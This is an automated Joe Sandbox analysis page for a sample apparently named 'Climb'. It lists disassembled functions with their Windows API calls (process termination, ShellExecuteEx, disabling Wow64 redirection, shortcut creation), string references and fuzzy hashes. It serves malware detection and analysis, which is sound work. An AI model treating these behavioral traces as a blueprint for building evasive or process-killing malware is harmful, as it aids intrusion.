_wcsstr.LIBVCRUNTIME ref: 004E567E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: aa2e187e331ae0f8dd9eb7da5d6b0a5ad2d6049d905486b7e8a843f9b3ec9419
Instruction ID: 065aa79a9df883bc0fa169d1c7e1b8aaf8306b3f9ac98e168036a653f0a0db2c
Opcode Fuzzy Hash: aa2e187e331ae0f8dd9eb7da5d6b0a5ad2d6049d905486b7e8a843f9b3ec9419
Instruction Fuzzy Hash: D92146322046407BEB255B3A9C49EBB7BA8DF55765F00802FF809CA191EBA9CC419664

Function 004F6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00485851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004855D1,?,?,004C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00485871

_wcslen.LIBCMT ref: 004F62C0
CoInitialize.OLE32(00000000), ref: 004F63DA
CoCreateInstance.OLE32(00520CC4,00000000,00000001,00520B34,?), ref: 004F63F3
CoUninitialize.OLE32 ref: 004F6411

Strings

.lnk, xrefs: 004F62BB, 004F6306, 004F63CA

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: c80a22643d706a27412832b3b4ba313fd3cb75a5e816d11a380ef115a10952f9
Instruction ID: 773f3fded5b903a85beeec0657ce95908d8befe75d6158cb702f8250d9914b0f
Opcode Fuzzy Hash: c80a22643d706a27412832b3b4ba313fd3cb75a5e816d11a380ef115a10952f9
Instruction Fuzzy Hash: 3FD15271A042059FC714EF25C480A2EBBE6FF89718F01885EF9859B361CB39EC45CB96

Function 004A36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004A36E9,004A3355), ref: 004A3700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004A370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004A3727
SetLastError.KERNEL32(00000000,?,004A36E9,004A3355), ref: 004A3779

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ea2eb8e4ca7a068aba923fa45c7b6b1212d639fc5adf76ed7bacf33a09d9b325
Instruction ID: 32f1715b5845d13d91d6769673dca181a668a70a80673c78d9dda460910f909a
Opcode Fuzzy Hash: ea2eb8e4ca7a068aba923fa45c7b6b1212d639fc5adf76ed7bacf33a09d9b325
Instruction Fuzzy Hash: E10128FA7093212EA6282FB5BCCA5A72AA4EB3777B720422FF014451F0FF594D066158

Function 004B30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,004A4D53,00000000,?,?,004A68E2,?,?,00000000), ref: 004B30EB
_free.LIBCMT ref: 004B311E
_free.LIBCMT ref: 004B3146
SetLastError.KERNEL32(00000000,?,00000000), ref: 004B3153
SetLastError.KERNEL32(00000000,?,00000000), ref: 004B315F
_abort.LIBCMT ref: 004B3165

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: cd0a7549e283bbf29630df4dd000d20383146fa5b544f4b3566d98f0e862476c
Instruction ID: 0409762da1553fa90c9d50eb5d16ca7cae59d0a328f4841534a7b5faf92b8e51
Opcode Fuzzy Hash: cd0a7549e283bbf29630df4dd000d20383146fa5b544f4b3566d98f0e862476c
Instruction Fuzzy Hash: 9DF0F93560050036C2117F3FAD06AEF167DAFD177AB21081BF924922D1EE6C8D06517D

Function 00519480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00481F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00481F87
Part of subcall function 00481F2D: SelectObject.GDI32(?,00000000), ref: 00481F96
Part of subcall function 00481F2D: BeginPath.GDI32(?), ref: 00481FAD
Part of subcall function 00481F2D: SelectObject.GDI32(?,00000000), ref: 00481FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 005194AA
LineTo.GDI32(?,00000003,00000000), ref: 005194BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 005194CC
LineTo.GDI32(?,00000000,00000003), ref: 005194DC
EndPath.GDI32(?), ref: 005194EC
StrokePath.GDI32(?), ref: 005194FC

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: ab38bd8ebf2322cad088579da440f16e6fa3bb2efca754d23368407bebc8c360
Instruction ID: c62adbc23fb14609fb7537bb689e9d7e4c584c614a93405fa26b8c31f7738b81
Opcode Fuzzy Hash: ab38bd8ebf2322cad088579da440f16e6fa3bb2efca754d23368407bebc8c360
Instruction Fuzzy Hash: 9211097600010DBFEF029F90DC88EEA7FADEB18364F04C011BA195A161D7719D99EBA0

Function 0048327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 004832AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 004832B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004832C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004832CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 004832D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 004832DD

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 48d3cef4e75b2910349be6898d4b2799907553f99ede84a9a5f9caee4537bfa5
Instruction ID: e0aab4cee647c3bb717d57baafbb1b274257449aa3b5a5d4a70082afc931f475
Opcode Fuzzy Hash: 48d3cef4e75b2910349be6898d4b2799907553f99ede84a9a5f9caee4537bfa5
Instruction Fuzzy Hash: CC016CB09017597DE3008F5A8C85B52FFB8FF19354F00411B915C4B941C7F5A864CBE5

Function 004EF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004EF447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004EF45D
GetWindowThreadProcessId.USER32(?,?), ref: 004EF46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004EF47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004EF485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004EF48C

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6efb491549166e702b572655fb7981686fac5143fdf95d9b719c91cde499460c
Instruction ID: 5a6cfc7ce931c6398bafce94a06a29e809933f337b452b201411d21108cb709c
Opcode Fuzzy Hash: 6efb491549166e702b572655fb7981686fac5143fdf95d9b719c91cde499460c
Instruction Fuzzy Hash: BFF0BE32241158BFE7215B629C0EEEF3F7CEFE6B11F004018F601D1090D7A42A09E6B5

Function 004C34D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 004C34EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 004C3506
GetWindowDC.USER32(?), ref: 004C3512
GetPixel.GDI32(00000000,?,?), ref: 004C3521
ReleaseDC.USER32(?,00000000), ref: 004C3533
GetSysColor.USER32(00000005), ref: 004C354D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 555b1e8d3dbec42b94ce4dff66c03142794e7abadfa6b3accc4fae481c34d5bd
Instruction ID: 925354089b47e543074501eb30128146e029872ee063a34df2f769fb4c2efd23
Opcode Fuzzy Hash: 555b1e8d3dbec42b94ce4dff66c03142794e7abadfa6b3accc4fae481c34d5bd
Instruction Fuzzy Hash: 8B014B31500215FFDB505FA4DC08FFA7BB1FB14321F518565F91AA21A0CB351E56EB21

Function 004E21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004E21CC
UnloadUserProfile.USERENV(?,?), ref: 004E21D8
CloseHandle.KERNEL32(?), ref: 004E21E1
CloseHandle.KERNEL32(?), ref: 004E21E9
GetProcessHeap.KERNEL32(00000000,?), ref: 004E21F2
HeapFree.KERNEL32(00000000), ref: 004E21F9

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 51b83bb9e1982355929560e5cc2123863796f8002adb6cc1be3f2cd8b75c0014
Instruction ID: 0edcffd485c6bf7670f68fba5bce0003fb709640b0359d4fa4f0e83c03261579
Opcode Fuzzy Hash: 51b83bb9e1982355929560e5cc2123863796f8002adb6cc1be3f2cd8b75c0014
Instruction Fuzzy Hash: DBE0E576044105BBDB012FA1EC0C98AFF39FF69322B108620F225820B0CB339424EB60

Function 0050B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0050B903

Part of subcall function 004841EA: _wcslen.LIBCMT ref: 004841EF

GetProcessId.KERNEL32(00000000), ref: 0050B998
CloseHandle.KERNEL32(00000000), ref: 0050B9C7

Strings

<, xrefs: 0050B8CB
@, xrefs: 0050B8D2

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 61310ceaab41ee74841c2b64d3f4e7cda559ed658059fcc66f1bbd4c339d0110
Instruction ID: b591d13341912b994414a90377f9c4e3486a4a16a283d1ad7db5603ddc4adfb5
Opcode Fuzzy Hash: 61310ceaab41ee74841c2b64d3f4e7cda559ed658059fcc66f1bbd4c339d0110
Instruction Fuzzy Hash: FA716874A00215DFDB10EF55C484A9EBBF5FF08304F04889EE855AB2A2CB74ED45CB94

Function 00514818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005148D1
IsMenu.USER32(?), ref: 005148E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0051492E
DrawMenuBar.USER32 ref: 00514941

Strings

0, xrefs: 00514825

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: f70a421f7ae88f469f9cb0ebe64920be27c1c8660738e278c2454f70db4b0ba6
Instruction ID: 407429e7b127e0169c4443d69d6232da76a732b9b8650499cba95040224664ff
Opcode Fuzzy Hash: f70a421f7ae88f469f9cb0ebe64920be27c1c8660738e278c2454f70db4b0ba6
Instruction Fuzzy Hash: 36416875A00209EFEB10CF61D984AEABBB9FF16324F089129E945A7350C330AD84DF60

Function 004E272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 004E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004E4620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004E27B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004E27C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 004E27F6

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

Strings

ListBox, xrefs: 004E2772
ComboBox, xrefs: 004E273D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 604401b861660c9bda8871c17d298eef97f1ac56d12c70e0293d0b07912fa405
Instruction ID: 843856796c1f1b9aebe1802b38501e7ff276d3a2a65905381c138fcf17111bee
Opcode Fuzzy Hash: 604401b861660c9bda8871c17d298eef97f1ac56d12c70e0293d0b07912fa405
Instruction Fuzzy Hash: E72106719001047EDB057B62C845DFF7BB8EF55355B00461FF411A31D1CB7C490A9764

Function 005139B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00513A29
LoadLibraryW.KERNEL32(?), ref: 00513A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00513A45
DestroyWindow.USER32(?), ref: 00513A4D

Strings

SysAnimate32, xrefs: 00513A04

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 207e77d39edbe8847715873681ada45f81984bc0083e2db1e8a69df76778d86a
Instruction ID: a0ee18e3cdebd251987d40af9ee31aa3993a2c47ed9686093f03661c1eae5ea2
Opcode Fuzzy Hash: 207e77d39edbe8847715873681ada45f81984bc0083e2db1e8a69df76778d86a
Instruction Fuzzy Hash: 60219D71600205ABFF109F64DCA4FFB7BA9FF55368F109618FA91921A0D771CD80A760

Function 00519A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

GetCursorPos.USER32(?), ref: 00519A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00519A72
GetCursorPos.USER32(?), ref: 00519ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00519AF0

Strings

(U, xrefs: 00519A30

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: (U
API String ID: 2864067406-2725093197
Opcode ID: dedc018c73542cb24fc532b357011ff5337258a7dc1a048a9186866d612001de
Instruction ID: 3303c20e7dd79b5d023158cb9e85a4163409b187332e5f2a6ee0ae858d678143
Opcode Fuzzy Hash: dedc018c73542cb24fc532b357011ff5337258a7dc1a048a9186866d612001de
Instruction Fuzzy Hash: FB21BF38A00118AFDF259F94C868EEE7FBAFF4A310F404059F9054B2A1D3359998EB60

Function 00481AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00481AF4
GetClientRect.USER32(?,?), ref: 004C31F9
GetCursorPos.USER32(?), ref: 004C3203
ScreenToClient.USER32(?,?), ref: 004C320E

Strings

(U, xrefs: 00481AB2

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID: (U
API String ID: 4127811313-2725093197
Opcode ID: 240842df192d48c3aa11684f7e272dfed6c86bb2824e462faa9423f76a8757df
Instruction ID: b839dd80665a4a98e3d50889b857b5f1a57a2f9ed9a242fd935656e1ba3a2389
Opcode Fuzzy Hash: 240842df192d48c3aa11684f7e272dfed6c86bb2824e462faa9423f76a8757df
Instruction Fuzzy Hash: 9E116A35A01119AFCF04EFA8C985DEE77B8FB05345F004857E902E2250C738BA86DBB9

Function 004A50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004A508E,?,?,004A502E,?,005498D8,0000000C,004A5185,?,00000002), ref: 004A50FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004A5110
FreeLibrary.KERNEL32(00000000,?,?,?,004A508E,?,?,004A502E,?,005498D8,0000000C,004A5185,?,00000002,00000000), ref: 004A5133

Strings

mscoree.dll, xrefs: 004A50F6
CorExitProcess, xrefs: 004A5108

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e27f4d91d582508ead84a85fcab6f78cefde8248fe7181b8078f61167783a8b3
Instruction ID: 2d032a9e7122998b896d9631804f00ec1ab98f2c2149bbc70613fcfc0e994358
Opcode Fuzzy Hash: e27f4d91d582508ead84a85fcab6f78cefde8248fe7181b8078f61167783a8b3
Instruction Fuzzy Hash: 2DF0FC31940618FFDB145F94DC09BEEBFB4EF65712F044065F805A22A0DB385D44DBA4

Function 0048663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,0048668B,?,?,004862FA,?,00000001,?,?,00000000), ref: 0048664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0048665C
FreeLibrary.KERNEL32(00000000,?,?,0048668B,?,?,004862FA,?,00000001,?,?,00000000), ref: 0048666E

Strings

Wow64DisableWow64FsRedirection, xrefs: 00486656
kernel32.dll, xrefs: 00486642

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
